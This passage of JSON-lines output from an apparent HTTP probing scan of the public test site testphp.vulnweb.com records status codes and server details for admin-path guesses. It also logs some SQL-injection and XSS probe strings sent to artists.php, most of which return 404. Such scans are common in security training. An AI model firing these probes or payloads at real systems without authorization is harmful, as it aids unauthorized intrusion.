Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/images\",\"time\":\"351.853943ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.092793495Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/rate.php\",\"input\":\"http://testphp.vulnweb.com:80/Mod_Rewrite_Shop/rate.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/rate.php\",\"time\":\"355.762493ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":6,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.12813471Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Templates\",\"input\":\"http://testphp.vulnweb.com:80/Templates\",\"location\":\"http://testphp.vulnweb.com/Templates/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates\",\"time\":\"347.420209ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.193919118Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/Templates/main_dynamic_template.dwt.php\",\"input\":\"http://testphp.vulnweb.com:80/Templates/main_dynamic_template.dwt.php\",\"title\":\"Document titleg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/main_dynamic_template.dwt.php\",\"time\":\"347.442691ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":480,\"lines\":105,\"status_code\":200,\"content_length\":4697,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.250254575Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/abrar\",\"input\":\"http://testphp.vulnweb.com:80/abrar\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/abrar\",\"time\":\"351.69163ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.256390028Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/acunetix_file_inclusion\",\"input\":\"http://testphp.vulnweb.com:80/acunetix_file_inclusion\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/acunetix_file_inclusion\",\"time\":\"344.218524ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.275110971Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/adm/login.php\",\"input\":\"http://testphp.vulnweb.com:80/adm/login.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/adm/login.php\",\"time\":\"342.997759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.323646067Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/adm1npan3l\",\"input\":\"http://testphp.vulnweb.com:80/adm1npan3l\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/adm1npan3l\",\"time\":\"352.494226ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.324599447Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/adm1nPan3l/home.php\",\"input\":\"http://testphp.vulnweb.com:80/adm1nPan3l/home.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/adm1nPan3l/home.php\",\"time\":\"351.889511ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.4254816Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin\",\"input\":\"http://testphp.vulnweb.com:80/admin\",\"location\":\"http://testphp.vulnweb.com/admin/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin\",\"time\":\"348.365065ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.463046791Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin.\",\"input\":\"http://testphp.vulnweb.com:80/admin.\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin.\",\"time\":\"344.709268ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.487601857Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin.asp\",\"input\":\"http://testphp.vulnweb.com:80/admin.asp\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin.asp\",\"time\":\"343.394518ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.530581291Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin.aspx\",\"input\":\"http://testphp.vulnweb.com:80/admin.aspx\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin.aspx\",\"time\":\"351.925943ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.666828046Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin.php\",\"input\":\"http://testphp.vulnweb.com:80/admin.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin.php\",\"time\":\"347.053902ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.684165863Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/?C=M;O=A\",\"input\":\"http://testphp.vulnweb.com:80/admin/?C=M;O=A\",\"title\":\"Index of /admin/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/?C=M;O=A\",\"time\":\"339.840098ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":66,\"lines\":8,\"status_code\":200,\"content_length\":262,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.686549989Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/?C=D;O=A\",\"input\":\"http://testphp.vulnweb.com:80/admin/?C=D;O=A\",\"title\":\"Index of /admin/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/?C=D;O=A\",\"time\":\"350.759603ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":66,\"lines\":8,\"status_code\":200,\"content_length\":262,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.73918277Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/?C=N;O=D\",\"input\":\"http://testphp.vulnweb.com:80/admin/?C=N;O=D\",\"title\":\"Index of /admin/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/?C=N;O=D\",\"time\":\"339.213827ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":66,\"lines\":8,\"status_code\":200,\"content_length\":262,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.762031547Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/admin.ajax\",\"input\":\"http://testphp.vulnweb.com:80/admin/admin.ajax\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/admin.ajax\",\"time\":\"342.340337ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.765553013Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/?C=S;O=A\",\"input\":\"http://testphp.vulnweb.com:80/admin/?C=S;O=A\",\"title\":\"Index of /admin/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/?C=S;O=A\",\"time\":\"346.973247ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":66,\"lines\":8,\"status_code\":200,\"content_length\":262,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.766102518Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/CVS\",\"input\":\"http://testphp.vulnweb.com:80/admin/CVS\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/CVS\",\"time\":\"342.690871ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.850049219Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/create.sql\",\"input\":\"http://testphp.vulnweb.com:80/admin/create.sql\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/create.sql\",\"time\":\"340.189772ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":35,\"lines\":26,\"status_code\":200,\"content_length\":523,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.891585021Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/index.php\",\"input\":\"http://testphp.vulnweb.com:80/admin/index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/index.php\",\"time\":\"342.806426ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.898824761Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/login.php\",\"input\":\"http://testphp.vulnweb.com:80/admin/login.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/login.php\",\"time\":\"342.802439ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.930475581Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin/upload\",\"input\":\"http://testphp.vulnweb.com:80/admin/upload\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin/upload\",\"time\":\"346.129423ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.971195602Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admin_login\",\"input\":\"http://testphp.vulnweb.com:80/admin_login\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admin_login\",\"time\":\"354.36406ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:19.9797167Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/administrator.php\",\"input\":\"http://testphp.vulnweb.com:80/administrator.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/administrator.php\",\"time\":\"344.803749ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.003482206Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/admininfo.php\",\"input\":\"http://testphp.vulnweb.com:80/admininfo.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/admininfo.php\",\"time\":\"352.585049ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.073022025Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/adminlogin.aspx\",\"input\":\"http://testphp.vulnweb.com:80/adminlogin.aspx\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/adminlogin.aspx\",\"time\":\"351.003001ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.124366303Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/ajax/infoartists.php\",\"input\":\"http://testphp.vulnweb.com:80/ajax/infoartists.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ajax/infoartists.php\",\"time\":\"349.297802ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.148560394Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/array.php\",\"input\":\"http://testphp.vulnweb.com:80/array.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/array.php\",\"time\":\"356.301381ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.167721918Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artist.php\",\"input\":\"http://testphp.vulnweb.com:80/artist.php?\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artist.php\",\"time\":\"339.889643ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.180623442Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php\",\"input\":\"http://testphp.vulnweb.com:80/artists.php\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php\",\"time\":\"358.537833ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.240492272Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php '\",\"input\":\"http://testphp.vulnweb.com:80/artists.php%20'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php%20%27\",\"time\":\"347.217243ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.299974735Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php HTTP/'\",\"input\":\"http://testphp.vulnweb.com:80/artists.php%20HTTP/'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php%20HTTP/%27\",\"time\":\"348.189824ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.304127537Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php order by 1--+\",\"input\":\"http://testphp.vulnweb.com:80/artists.php%20order%20by%201--+\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php%20order%20by%201--+\",\"time\":\"346.555111ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.331937444Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php\\\"\",\"input\":\"http://testphp.vulnweb.com:80/artists.php%22\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php%22\",\"time\":\"346.169917ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.363439632Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php\\u003cscript\\u003ealert(\\\"hacked\\\")\\u003c/script\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/artists.php%3Cscript%3Ealert(%22hacked%22)%3C/script%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php%3Cscript%3Ealert%28%22hacked%22%29%3C/script%3E\",\"time\":\"344.904657ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.375135206Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php\\u003ch1\\u003ehello\\u003c/h1\\u003e\\u003cscript\\u003ealert(\\\"hacked\\\")\\u003c/script\\u003e\",\"input\":\"http://testphp.vulnweb.com:80/artists.php%3Ch1%3Ehello%3C/h1%3E%3Cscript%3Ealert(%22hacked%22)%3C/script%3E\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php%3Ch1%3Ehello%3C/h1%3E%3Cscript%3Ealert%28%22hacked%22%29%3C/script%3E\",\"time\":\"343.690435ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.470673205Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php'\",\"input\":\"http://testphp.vulnweb.com:80/artists.php'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php'\",\"time\":\"356.085401ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.49463528Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php' order by 1--+\",\"input\":\"http://testphp.vulnweb.com:80/artists.php'%20order%20by%201--+\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php%27%20order%20by%201--+\",\"time\":\"345.998325ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.524832376Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php*\",\"input\":\"http://testphp.vulnweb.com:80/artists.php*\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php*\",\"time\":\"361.985009ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.535873079Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php..\",\"input\":\"http://testphp.vulnweb.com:80/artists.php..\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php..\",\"time\":\"339.53397ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:20.572244953Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/artists.php/artists.php HTTP/'\",\"input\":\"http://testphp.vulnweb.com:80/artists.php/artists.php%20HTTP/'\",\"title\":\"404 Not 